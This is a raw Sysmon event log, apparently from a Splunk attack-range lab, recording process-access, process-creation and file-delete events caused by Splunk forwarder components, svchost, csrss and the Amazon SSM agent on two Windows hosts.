11:13:49.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220895Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220894Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.672{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-16ED-6216-FF04-000000003902}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220893Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.672{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16ED-6216-FF04-000000003902}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220892Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.673{4F8D34B0-16ED-6216-FF04-000000003902}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000220891Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.391{4F8D34B0-16ED-6216-FE04-000000003902}19043864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220890Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.172{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16ED-6216-FE04-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220889Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.172{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220888Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.172{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220887Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.172{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220886Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.172{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220885Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.172{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220884Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.172{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220883Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.172{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220882Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.172{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220881Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.172{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220880Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.172{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-16ED-6216-FE04-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220879Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.172{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16ED-6216-FE04-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220878Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.173{4F8D34B0-16ED-6216-FE04-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220908Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:50.891{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E243BB9C2A3CD818BC11324441F5F9D,SHA256=6149F8F9BA892A5E89C02F8BAA1870F52EAB2E29927DA515B661FCA8CF70DA0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:50.920{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D08BED44237E5068E2532F3AABC063A,SHA256=74C463B01F7586801DC232BE8AD5ABA8C6EE6AA59A3D621BEC6007926F17F178,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:50.789{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-156MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220907Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:50.312{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F42C1E2D7C9149D5FB4D63662082EDDE,SHA256=A78C02B1CC4DF0D5F58734AE29A0D39B4CB46D6AF9BCD6F594775999B4EB658B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220906Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:50.312{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B72C357B62D50C367AFC58F4D8EC3A7,SHA256=DD7A234BD257C8112791E2D8A312C5A6D8F02226EE625B40253F9CD77333A285,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:51.921{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8F8630C3E7756C75231A55F2DBC7F4A,SHA256=CCA1EBBCC50011602FBA2E7D2107727F5B58B7910F6A5E7197D143BA5C5D525C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220921Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:51.219{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16EF-6216-0005-000000003902}3144C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220920Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:51.219{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220919Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:51.219{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220918Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:51.219{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220917Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 